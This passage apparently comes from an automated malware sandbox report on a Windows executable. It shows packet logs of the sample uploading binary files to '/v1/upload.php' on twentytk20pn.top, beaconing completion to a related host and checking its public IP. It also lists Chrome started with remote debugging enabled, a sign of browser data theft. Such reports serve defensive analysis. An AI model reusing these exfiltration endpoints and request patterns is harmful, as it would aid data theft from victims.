Dec 19, 2024 08:47:21.733385086 CET	1236	IN	Data Raw: ad 34 aa 23 bf ad 17 e6 2a 10 97 19 92 72 47 53 4c f0 19 5a 9a 9b 85 e6 db f7 f5 55 73 a5 27 d3 b4 54 e4 77 0d e7 83 22 4e c1 4d f8 e4 af 4c 0b ab 1a 54 ad 8d 16 6f af 43 78 89 39 0b bb 8c 4d ba 09 8b e5 dc 59 48 e6 45 66 4b 7d 51 80 62 76 3c 15 Data Ascii: 4#*rGSLZUs'Tw"NMLToCx9MYHEfK}Qbv<2Ul&j6TmZJododF<J%^n?YBWg>{96fr]:,)&2/u\|!\|^X~qV(TkYqK#sgI
Dec 19, 2024 08:47:21.733660936 CET	1236	IN	Data Raw: 7e a3 a2 b8 69 73 67 3f 48 2f 0d a8 bf 56 dc 8d af d6 b2 61 f7 f8 f3 fd 77 21 5f 29 8c ce 3f 9d 2d 90 92 87 6a 25 12 2a ff 4d 26 76 bd 71 86 ba ea 9c 89 13 01 98 9d 0e f3 98 18 94 4f 48 59 58 fa 41 d0 0a 1a c1 86 e0 75 a0 61 ec 3f c9 d1 c5 a8 35 Data Ascii: ~isg?H/Vaw!_)?-j%*M&vqOHYXAua?59l"\rI)R`]Pgg{_''VmA!!ICT0aWJ%rt,@k4M{F>#rM@d[P816\z
Dec 19, 2024 08:47:21.733668089 CET	448	IN	Data Raw: c9 cc c3 19 7b b0 d2 46 b9 b4 20 24 9a d8 ff 55 df 52 db de 94 9a b9 05 e2 22 53 b1 34 6d 3e af e5 be c2 be a5 d9 d2 98 61 ec 6d 1e 76 a9 d9 8b 95 47 da 2e 24 aa aa 52 b9 f9 e5 43 7b 82 ae 34 e5 4d 68 de 13 fb 1f 8f bc 44 8e 32 b7 b3 5f 61 f6 1b Data Ascii: {F $UR"S4m>amvG.$RC{4MhD2_as4-(Y2GG,xyh[`\|hZ:zs;l=7ZGa\|cxgs.4VjHEO!ppU'c_^tu\&ByAOV<S&vFex8on2T7
Dec 19, 2024 08:47:21.735532999 CET	1236	IN	Data Raw: 97 2d 22 f8 24 23 2a a6 8b d6 bf c3 c0 8d 83 b0 9b bd 5b c7 db e4 3a a3 83 53 b0 b7 65 0e f0 32 c5 a1 5c 45 89 a3 a2 e7 d8 80 c1 a1 41 a8 b5 1a b7 02 f5 56 d3 74 c3 55 f7 ef e5 0f c7 21 38 88 a6 11 15 70 37 94 c8 64 55 97 e9 14 2b 82 73 30 c9 a4 Data Ascii: -"$#*[:Se2\EAVtU!8p7dU+s0ZP>fkE#K2@0-rEz z%:WuvORyu.D0y$%X-20jxF6Y9KL.V8bdU/vP_>
Dec 19, 2024 08:47:21.735739946 CET	1236	IN	Data Raw: c7 2e 72 99 ae 39 a7 3f 8e 79 8c 45 2a b4 37 c7 d2 d2 de 55 80 98 ae e4 c3 d3 46 a9 5a 41 a4 9a e2 7b db 07 92 08 52 16 1c d0 0c 4c 15 fe 17 33 2f 4f ea 60 b7 42 33 15 80 7b a3 be f6 ac 63 4a d8 cd 60 e2 b4 0c 29 79 99 9e 60 ba 1a 85 01 94 c5 7d Data Ascii: .r9?yE*7UFZA{RL3/O`B3{cJ`)y`}>2g_ViZMh%58,'XH%dR'yC"mM?Kau{K4T2.M2=rGT2jl=c=53S-&AH1q\
Dec 19, 2024 08:47:21.735745907 CET	448	IN	Data Raw: af 57 a5 1e 15 3b 3b 2b 87 8b 40 7c e4 43 7a 6c 9e 13 a3 da b8 9a 5d 61 a9 62 09 c0 51 e6 22 3e e1 3a 89 1f 05 32 da 0a d0 18 05 ef f5 2b ab 8b 82 70 02 8a 23 5e 23 7c c4 d0 ef 12 ca 88 d8 40 b1 8c 29 8b ef 99 b0 4f 50 ad 80 df 71 e1 cf 48 3d 5f Data Ascii: W;;+@\|Czl]abQ">:2+p#^#\|@)OPqH=_p@akD{6TFEizG`0jUXSaKO0"sZ~"Z(eO*FzV'0+,\|Y@;QcH8O?0W5P:{,&S75U!`EP5DQ>
Dec 19, 2024 08:47:21.737559080 CET	1236	IN	Data Raw: 79 cf 16 71 bf 4b 76 76 3a 63 98 bd af 65 dd e6 6e ba f3 2d 09 72 60 14 69 4d 51 ac 83 38 61 c5 b6 40 18 f7 82 c5 bb b0 60 4a 61 61 69 4a 9b a4 68 b9 8d 83 ca 28 4e ca 15 75 dd fd ac ed c6 7d 11 1e f4 2e ab 22 90 b0 a6 ab e2 7d 20 dd fb 5e 1f 5e Data Ascii: yqKvv:cen-r`iMQ8a@`JaaiJh(Nu}."} ^^nC\|x&TT^Y^xcbd&g~B#am`%oF*q56Q=e:PaX#^@$'/vk,FMjR}lWLvn&_t)f@:
Dec 19, 2024 08:47:21.737776041 CET	1236	IN	Data Raw: df 09 52 0c 8c 14 76 ac cf 96 82 e3 d0 03 fe 64 88 27 97 6b cf 80 c4 47 15 25 9d c4 88 ab f5 e8 2b f0 5f b0 52 54 32 4a 58 39 c8 af 12 3d 34 ad 70 f8 9f 54 63 d7 e0 f6 e3 5d 3f fd 03 26 c9 f2 04 fc 9c 75 d6 6b 7e a4 3f 64 50 85 72 81 a2 4d d6 9f Data Ascii: Rvd'kG%+_RT2JX9=4pTc]?&uk~?dPrM:0IV#ZF;W={&9,.q~%-bsC$yIFFly>{Ss!%wOa8r^I['cBi>sbx4-"1
Dec 19, 2024 08:47:21.851933002 CET	1236	IN	Data Raw: 45 c3 58 f0 b8 d5 43 f4 4f ba 13 ba 7d 06 b9 dc e3 5e 8b c9 10 32 7d 4d c5 64 e0 d8 8e 51 96 ad 84 9d 51 c9 b3 f7 d6 dc 1b 89 81 8a 42 46 82 21 df d7 a5 f2 cc b1 f2 3b b1 6c 3b 9a c8 96 93 6b 6c 89 70 0e 43 69 23 61 49 85 f9 87 66 15 9c c8 b4 3d Data Ascii: EXCO}^2}MdQQBF!;l;klpCi#aIf=r/,?:~oOVu=\m/Sp#.0T\/gOgQgj&7yVV!Vo)c%g&(M@AM($mJ(!`R[%nxe=v 0`~

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49765	194.87.47.113	80	5408	C:\Users\user\Desktop\SwJD3kiOwV.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 08:47:44.933712959 CET	645	OUT	POST /v1/upload.php HTTP/1.1 Host: twentytk20pn.top Accept: / Content-Length: 463 Content-Type: multipart/form-data; boundary=------------------------TisMAZIelaYgzj57pP66pH Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 54 69 73 4d 41 5a 49 65 6c 61 59 67 7a 6a 35 37 70 50 36 36 70 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 48 69 77 6f 6d 6f 78 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 19 67 35 71 57 b4 17 45 dc 54 6a 68 5e 99 83 bd ef 04 19 50 30 e6 03 e1 3b 19 5e 71 d1 8a bb 59 84 e7 42 54 da e0 35 db 11 75 f2 60 1e 33 3b 54 cd 3d 82 19 89 22 5e c5 f3 23 22 0f 49 30 9d ab 70 15 53 4f 3b 94 40 ac 16 a3 db 9e 8d e0 7a 6e a8 5f 65 e4 25 79 85 8c 69 e5 3a e4 31 38 be cb a2 d1 c8 85 b5 d3 dd 9d 25 75 97 55 4d ff ed cb b8 fa ff 14 d3 ca 58 bc 23 b6 7b 7a fa 6c 39 9d 0f 7b 52 51 99 8b fd 61 a1 7a a8 41 90 1a 27 6e d1 2b 09 19 cf 1b 5b d4 0c dd 53 3e bd 97 bd 0c b0 84 01 18 47 cf bd 3b d7 8d 70 46 0c b3 de 9f bf [TRUNCATED] Data Ascii: --------------------------TisMAZIelaYgzj57pP66pHContent-Disposition: form-data; name="file"; filename="Hiwomox.bin"Content-Type: application/octet-streamg5qWETjh^P0;^qYBT5u`3;T="^#"I0pSO;@zn_e%yi:18%uUMX#{zl9{RQazA'n+[S>G;pFWTd:\|gR]'Z=}cyxG<Kl3NQ0--------------------------TisMAZIelaYgzj57pP66pH--
Dec 19, 2024 08:47:46.425045013 CET	274	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 19 Dec 2024 07:47:46 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close X-RateLimit-Limit: 30 X-RateLimit-Remaining: 14 X-RateLimit-Reset: 1734595459 ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49772	194.87.47.113	80	5408	C:\Users\user\Desktop\SwJD3kiOwV.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 08:47:48.106890917 CET	12360	OUT	POST /v1/upload.php HTTP/1.1 Host: twentytk20pn.top Accept: / Content-Length: 95424 Content-Type: multipart/form-data; boundary=------------------------lryIJqtr6LAdfXkf877zhf Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6c 72 79 49 4a 71 74 72 36 4c 41 64 66 58 6b 66 38 37 37 7a 68 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4d 65 78 65 7a 75 68 65 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 6d fd c4 f8 1d 4d 74 55 1e 50 60 ba 4f 9d b9 59 ac 58 02 e7 47 50 89 d6 18 cb 3f df 9e ae 1a 23 36 11 c6 f9 05 58 dc a0 04 e8 74 49 43 ff c7 f3 f6 cc 03 ef 7d 92 3d 82 b6 99 7e 05 7b 64 d7 ea 04 5c c1 75 ef 06 20 e2 d9 21 e9 45 8b 95 82 7f 47 9f 9e c9 62 ec fe 52 4e cb 4c 84 8b 1f a8 03 87 93 63 6d e6 f9 d2 c9 56 e3 0e 04 29 56 e2 cf 04 73 bf aa d9 b4 69 2d ea 63 86 58 4b e8 f0 3d 2f ea 23 9b 3e 34 9d 0e 89 97 e5 df a4 66 83 a2 51 08 0b fa 4e 1c b4 6c fb a0 fd 7d 9b 2e 45 19 f9 d6 5f b9 30 46 17 09 5c c3 47 2d fc 01 12 86 [TRUNCATED] Data Ascii: --------------------------lryIJqtr6LAdfXkf877zhfContent-Disposition: form-data; name="file"; filename="Mexezuhe.bin"Content-Type: application/octet-streammMtUP`OYXGP?#6XtIC}=~{d\u !EGbRNLcmV)Vsi-cXK=/#>4fQNl}.E_0F\G-VslHL<7B[RT\|ZE!GA)Q;w3l>HMf3{HG@&I;aNm* aRoX`qW776da-C88=\h-Bo8#yp?9;s<O}>~K;[0T~67irY4YX6<D-cH;WX9)`IWo.Z:0nx:}SBX/rKV$S 8,JJ=Y(br]h5u;VP:E/m}X^rcgC,=[[ +J!1)c%GhHJ-K3lN_>.z7k]uK&QiWO]2{y;x#=fM_9Ll8X. *Q%lf{9\|pCv6\Q]`i{S)8UH(&+a] [TRUNCATED]
Dec 19, 2024 08:47:48.324634075 CET	4944	OUT	Data Raw: 4d 29 d8 f5 34 9c 99 59 63 b7 7e 1f 10 4c 4c 34 43 34 15 14 07 52 73 05 e4 55 3f 5f 3f 10 f0 8e 08 4c 1d 61 a5 7a 0a 0b a3 0e 83 38 dc 30 c9 a7 12 9d ce 6b a7 ac 24 de fb 82 bc cb 73 4f fc c4 22 fc a2 83 f3 c6 d2 0d cc 18 fc 88 55 75 ec c6 da a8 Data Ascii: M)4Yc~LL4C4RsU?_?Laz80k$sO"Uu2bW@1PAURpf=oc(6t\259BmenLQoKqg@UJ/j?Z>6-p_:e?Pi)c[G=
Dec 19, 2024 08:47:48.324687958 CET	2472	OUT	Data Raw: 27 35 58 c7 a7 42 21 41 0b 17 f2 0c 1a b9 9b b9 44 39 0d af d7 1e 69 c1 52 14 fa 6b 85 46 13 e6 6b be c2 90 58 65 af c0 41 d0 3d aa d1 ad 70 6d c9 36 6a c8 5f f7 3c 37 47 0f ea bf 8b e5 19 4b 0a 39 d5 aa 1d a4 4d ae f2 5a 78 3b c0 b6 50 67 28 4d Data Ascii: '5XB!AD9iRkFkXeA=pm6j_<7GK9MZx;Pg(MkAkmG-vb`urXU}9w@q=omD?qs1'#p4IlhbcA0M~EKxU2nX=VXQ6E>A} e<~ sn
Dec 19, 2024 08:47:48.443511963 CET	2472	OUT	Data Raw: 8a 4b 59 95 cc 84 c8 e6 26 de d7 d3 b7 97 8e dd 7d 65 3b ba fe 3d 06 c1 3e 02 9f 06 52 71 5f c6 e1 a5 25 7a 0c 11 13 17 cd d0 a1 36 15 cc 2f d1 b6 43 6b 45 74 9e be d9 df 4a ae 39 6d 98 e1 52 30 46 e7 87 a1 e8 98 57 47 ec 18 e0 b0 31 8f 39 5b 95 Data Ascii: KY&}e;=>Rq_%z6/CkEtJ9mR0FWG19[Nt49&%mF]Pw@R>m?~KkX]3Gxl/K\|qWIr#TT*5xV\b-odP\|2}yEnU>4j~uCYyC<]
Dec 19, 2024 08:47:48.443553925 CET	2472	OUT	Data Raw: 50 e5 5d 54 30 1e 08 a3 69 68 cb 60 2a e5 f5 9e f8 3b d1 cd f1 71 0e 6a 33 55 08 f1 1e 55 24 9a 94 0a 9f 39 40 5e 9a b4 07 6c 8c 2c e9 98 72 86 a8 06 31 c7 3d cf 92 87 0d ff 8a 7e 6d 06 c8 f2 1d 12 ec 58 8f 2e 62 72 ef 95 a1 7b bc 1d 89 49 46 4b Data Ascii: P]T0ih`;qj3UU$9@^l,r1=~mX.br{IFK5`upkx0NYm\|S'lU{Vtk:\|Se{r, GV[P@N/91P($_6F;4 FdwN4=]*t0WJ3^P
Dec 19, 2024 08:47:48.443571091 CET	2472	OUT	Data Raw: 26 01 75 07 bc df d1 ec 2e 03 7a 40 17 a6 85 72 98 7b b3 95 7e 4e c4 10 3f 76 b4 2b 0a 98 a2 5e 82 84 e7 6e 01 c6 bb a3 12 a6 59 00 97 c5 a9 c0 e3 6f 17 43 0c da 29 1d 87 95 48 d0 08 a9 97 c4 c6 4c fa 61 cf a5 c6 7d 94 1e b5 ea 88 f0 22 ce c3 45 Data Ascii: &u.z@r{~N?v+^nYoC)HLa}"E/}kLO~HXjhG3"Or3//[YMk!m3264~t^7WqS4~h*e]'ue"}?^XLP;]W[$!0a
Dec 19, 2024 08:47:48.443602085 CET	2472	OUT	Data Raw: b7 e5 d1 ef 7f 54 42 38 5a 34 61 97 74 53 2d bd ce c9 59 e1 0e e5 63 43 50 94 aa d1 40 c6 5a 61 90 07 7b 40 0a 77 24 42 c0 ba 0f 43 aa dd e2 69 a8 40 f4 38 39 5d 75 03 f1 ef 61 d6 8e da a9 8d 74 88 eb f6 95 18 5f 0f 82 89 ae b3 ee 01 4a 81 3d 43 Data Ascii: TB8Z4atS-YcCP@Za{@w$BCi@89]uat_J=C>C\e3X wz;t[U2HXuM>2kew*}\|.PM qU8\,4T_?IHM GF"q)?2"k,"5\|C8Mc
Dec 19, 2024 08:47:48.443633080 CET	2472	OUT	Data Raw: c2 c2 47 47 72 e8 4a 55 5f 5a 78 46 5f b2 f4 b3 b6 ab 08 ea c8 d4 8f 7d 32 53 65 ff 24 ce 98 0f 61 14 ea f2 77 c4 f0 dd be 8c b4 66 26 71 c8 01 b9 54 2a d5 f2 94 2e 59 21 16 88 df 87 91 f7 3a 7c 72 e5 8e 80 54 38 52 16 b3 11 91 69 13 2d 9b 7b fb Data Ascii: GGrJU_ZxF_}2Se$awf&qT.Y!:\|rT8Ri-{%Zd)fEj9fRri41nwrP:7UM:C+<AS^)5Z,={Ct\cU?k&Cb@O9iqduw:~#lU
Dec 19, 2024 08:47:48.443666935 CET	2472	OUT	Data Raw: 06 79 24 54 12 76 b4 c2 e7 68 73 fb 18 b3 3b 76 a3 98 71 31 b1 75 7c 08 cf a1 7f 9e 5b 3a b3 35 fc b9 de 21 ea 76 2e b8 7a db 0e 5b 0e 3b 67 a9 8a af f4 20 f6 f8 8c 50 52 07 ba a2 2f 8e a0 ed 85 9f 95 e9 68 3a 40 e3 77 8b 96 71 4e 5e 5d 2a c6 46 Data Ascii: y$Tvhs;vq1u\|[:5!v.z[;g PR/h:@wqN^]*F(kbCZ@:)3p~{dA,~,-\IzYHa.;,CZ<I=okz8JTUYfjW8Sxxm c\{
Dec 19, 2024 08:47:48.443682909 CET	1236	OUT	Data Raw: 71 b6 95 92 da e9 ed 57 ff 11 29 1a ef 1a 54 97 aa 4c 62 82 34 5c 5b e3 41 c1 a4 a8 71 cd 35 ed 7e 20 64 56 6c 60 56 27 f2 21 ec 56 71 42 3c 71 62 3e 94 9e 13 5f a8 e3 da fc 61 6a 9e 57 8a 33 3d 20 ef d1 7e d5 57 26 d2 73 98 a4 7e 1f 83 57 00 71 Data Ascii: qW)TLb4\[Aq5~ dVl`V'!VqB<qb>_ajW3= ~W&s~Wq/tWRhU{tN&<dJ86{;\|JtAv^&ZH>pXM<PJIki"w?Y1@\TL$~TH y&[c2MR^XC#t4\|M
Dec 19, 2024 08:47:48.566620111 CET	1236	OUT	Data Raw: c1 32 d1 79 31 4c fc 9d 19 6a 25 d3 4d ca 3f be db 45 f2 36 18 0f 96 74 89 0f 95 1f 6c 51 69 ea f7 54 df 88 c7 80 e6 75 ad ac a8 18 da 1a a1 ba 79 f9 f3 ac 90 a7 4d f0 0a cb 91 36 31 3d 1e 9f 69 20 f7 8e e7 ab fd 0e 96 0c 78 36 e7 79 48 f7 93 53 Data Ascii: 2y1Lj%M?E6tlQiTuyM61=i x6yHSy0O6!{F3KJ\%uF$O; 9#(RF15yjD"FqH0@l_dR_p\4YRT_mT$Zr15{&7Eo:x&
Dec 19, 2024 08:47:50.069487095 CET	274	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 19 Dec 2024 07:47:49 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close X-RateLimit-Limit: 30 X-RateLimit-Remaining: 13 X-RateLimit-Reset: 1734595459 ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49804	194.87.47.113	80	5408	C:\Users\user\Desktop\SwJD3kiOwV.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 08:47:55.989913940 CET	12360	OUT	POST /v1/upload.php HTTP/1.1 Host: twentytk20pn.top Accept: / Content-Length: 32572 Content-Type: multipart/form-data; boundary=------------------------aURsCG5EBMGCYHjDHvtTrO Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 61 55 52 73 43 47 35 45 42 4d 47 43 59 48 6a 44 48 76 74 54 72 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 52 69 79 6f 7a 61 6e 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 00 f6 b8 b8 74 6b 9e d3 40 e4 af e8 d8 f2 3f a8 4d 74 e9 58 39 41 b6 7a 93 42 27 da 48 a4 81 58 79 11 c7 83 ed b5 45 34 ef 49 c9 62 4a d1 81 6e df 01 5c 20 4c 50 0c a7 6b f6 e6 e0 3c 11 8a 3c 4f 8e f9 58 7d e7 82 78 26 c7 b6 6a 4a 48 cf 16 fd aa b8 bd 34 4c ce 32 57 af 84 01 ec d4 39 18 d4 e2 4c 69 18 02 72 9a 74 31 4e ad ed af 5d 11 d3 d1 f2 d8 5e 40 f7 74 af 1f ce fa ef d7 6b c0 6e 10 43 2a 82 ac f5 a3 0f 11 b4 cb 8e 8d 57 e4 fa 57 ef e4 4c 5b 87 a5 b2 10 ed 01 2e 1f ea 34 62 28 f2 2c af 33 c2 70 7c e2 f8 86 b4 53 b0 e3 [TRUNCATED] Data Ascii: --------------------------aURsCG5EBMGCYHjDHvtTrOContent-Disposition: form-data; name="file"; filename="Riyozana.bin"Content-Type: application/octet-streamtk@?MtX9AzB'HXyE4IbJn\ LPk<<OX}x&jJH4L2W9Lirt1N]^@tknCWWL[.4b(,3p\|S>{s:8!!}Q7EqK3),<nQ-2^,&_1&&OAP0N JH1E'K^\NeK@G$!%rQjIEb :YtD^wtFsW+bS17E"At?:O>z5yhz&d_W&j]e#+K]ey$6,wklDpTQZ)!#"\Bo{T)#hW;i~B1XBD0:,`IB`pwTx<~{h$+ UilZBzmRD!<Oh(U5D%dco?Pn1Ou8Wa+^_Lw_s<i4OzI%]'N6#H4-Ni~yA4/l?pAN?4}9PvZ<Qd/RGKa{d*6lV/xa]kR [TRUNCATED]
Dec 19, 2024 08:47:56.109739065 CET	7416	OUT	Data Raw: 4b 1f ab 9a 50 ea 42 ac 6d 8b 37 f5 19 49 b0 0b 8d e0 68 a8 37 20 92 6f 80 6a 0d d9 7e 46 9a 6f 50 1d cb f6 67 61 8f a2 81 3e d7 e3 80 44 58 45 c0 ee 41 3a f0 80 b3 a9 b5 f3 66 98 5e e7 c6 78 43 44 d2 1d d6 38 88 0d 08 fb af e0 c2 26 c1 8c f2 30 Data Ascii: KPBm7Ih7 oj~FoPga>DXEA:f^xCD8&0ul_IguB=)YTtSEh&:1m\|3F%X*PIV#8Qj5\|s#+0"aC3.c7~@F#x;/h2@'j.PUm\Hv[e
Dec 19, 2024 08:47:56.109786987 CET	2472	OUT	Data Raw: 3b 54 1f 8c bb 36 c7 a5 e7 ce 1e 95 d2 6c d8 26 05 a2 eb bf 9c 36 95 97 f0 3e 45 c3 6c 09 f5 1d 1e 2c 66 8a 97 08 15 ed 94 03 97 46 6c 9d 5a c4 9e 6c ae f7 5a eb f8 0e 4f 9f c7 d4 a5 1c ec 70 2f 8f 39 01 10 ee a7 a2 08 0f 34 3d b5 a6 64 94 d7 17 Data Ascii: ;T6l&6>El,fFlZlZOp/94=d<Ok*$y,LVs<(qmo#LGB@B7,KE,y2a,YZi;jbH6ORMKH5!8&j7I+qnY<Ca7O$~]6zv
Dec 19, 2024 08:47:56.109808922 CET	2472	OUT	Data Raw: 4c 85 a3 34 fd 12 8f c8 99 3a ad 9c 9a c8 9c 0b 14 9c f9 0d 2f 26 d6 13 36 a0 8c 44 ef 73 e0 ff 97 62 69 91 14 ff 24 68 d6 67 e3 a3 6d 3e fb 07 a7 df e1 c5 1f b3 cc ee c5 ef a4 bb 88 47 04 57 6d f8 be 16 e4 d6 0f 84 29 8e cd 84 db 6d 44 55 6f 3f Data Ascii: L4:/&6Dsbi$hgm>GWm)mDUo?/Xq.)wk;Cc4RJ0;8UyX%F z]"\|~@!nha.!:f-97%C8!p9v(FFqSZX~MgD
Dec 19, 2024 08:47:56.109821081 CET	2472	OUT	Data Raw: 5d cc 3e 91 f1 4c e2 3c a8 2e 93 3e e6 29 b9 da 28 f6 77 59 e8 d0 f8 c8 10 f3 bb f3 b9 94 cd 14 68 45 e1 01 98 1b 14 ab 20 42 ad 18 ba cd 6e 31 4e ae 09 f3 58 f9 e4 8f ab b6 a5 19 26 74 c8 67 31 98 9a a0 5d 4d 0c 58 2e bc aa 28 e8 30 ac 07 1b c1 Data Ascii: ]>L<.>)(wYhE Bn1NX&tg1]MX.(0G77pe6QdX7V X6U?Ifrt_2MiOlk#3hn!="^6(%cDmy~sAxhZYG-n+w?Rc2e2e\|
Dec 19, 2024 08:47:56.109850883 CET	2472	OUT	Data Raw: e3 8a 34 de be 18 66 94 a1 75 d8 d8 51 c1 c7 fa b2 05 85 27 58 54 00 6b e2 15 59 61 df 20 3f f5 43 51 38 c6 76 54 96 7d 49 f7 03 b0 88 14 5f d4 26 0b 04 ec 4e 8b 3f 5e 89 da c3 7a 55 2e 83 cd 78 78 b5 60 66 be 79 d3 d8 47 2d 8b 05 ba 9c 00 b7 10 Data Ascii: 4fuQ'XTkYa ?CQ8vT}I_&N?^zU.xx`fyG-V0)Hw-+i#v\BNZ4hQ!D-C~74MFn\|iURzr{OV>H eG:ry!{;o>oG/ "l9P6}DsG%#he<
Dec 19, 2024 08:47:56.109914064 CET	3092	OUT	Data Raw: fc e9 89 d5 f5 ca 6c 73 1c 64 fe 1c db 90 b5 bc a4 e8 d1 5c 70 66 8c 96 8c 96 09 c3 b9 40 a6 ea 27 89 17 2e 44 bb 5c 7f b5 7a 5d 22 1a 14 29 07 23 2d 4a 72 c6 0f 41 26 a3 02 7d 2e b0 a4 62 e6 df 3e 32 8a 8b 11 85 1c 57 91 f3 fc 26 c8 a8 fb c0 c6 Data Ascii: lsd\pf@'.D\z]")#-JrA&}.b>2W&e?r([amGjFGV,ceo~3uxvSHEnw&$H&DxL^c6pUOaGDS;;Ea;
Dec 19, 2024 08:47:57.630501986 CET	274	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 19 Dec 2024 07:47:57 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close X-RateLimit-Limit: 30 X-RateLimit-Remaining: 12 X-RateLimit-Reset: 1734595459 ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49813	194.87.47.113	80	5408	C:\Users\user\Desktop\SwJD3kiOwV.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 08:47:58.913451910 CET	199	OUT	POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1 Host: home.twentytk20pn.top Accept: / Content-Type: application/json Content-Length: 56 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 48 69 47 47 48 45 46 45 67 6c 59 43 7a 37 36 67 31 37 33 34 35 39 34 34 33 39 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 32 22 20 7d Data Ascii: { "id1": "HiGGHEFEglYCz76g1734594439", "data": "Done2" }
Dec 19, 2024 08:48:00.461152077 CET	160	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Thu, 19 Dec 2024 07:48:00 GMT Content-Type: text/html; charset=utf-8 Content-Length: 4 Connection: close Data Raw: 6f 6b 61 79 Data Ascii: okay

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49699	98.85.100.80	443	5408	C:\Users\user\Desktop\SwJD3kiOwV.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 07:47:15 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2024-12-19 07:47:15 UTC	224	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 07:47:15 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2024-12-19 07:47:15 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Target ID:	2
Start time:	02:47:09
Start date:	19/12/2024
Path:	C:\Users\user\Desktop\SwJD3kiOwV.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SwJD3kiOwV.exe"
Imagebase:	0xad0000
File size:	4'453'376 bytes
MD5 hash:	CBB6759A3EB582B7A659EBE3BEE1DDAB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	04:05:20
Start date:	19/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	04:05:21
Start date:	19/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 --field-trial-handle=2328,i,18314253057255408516,4611028150433437333,262144 /prefetch:8
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	04:06:28
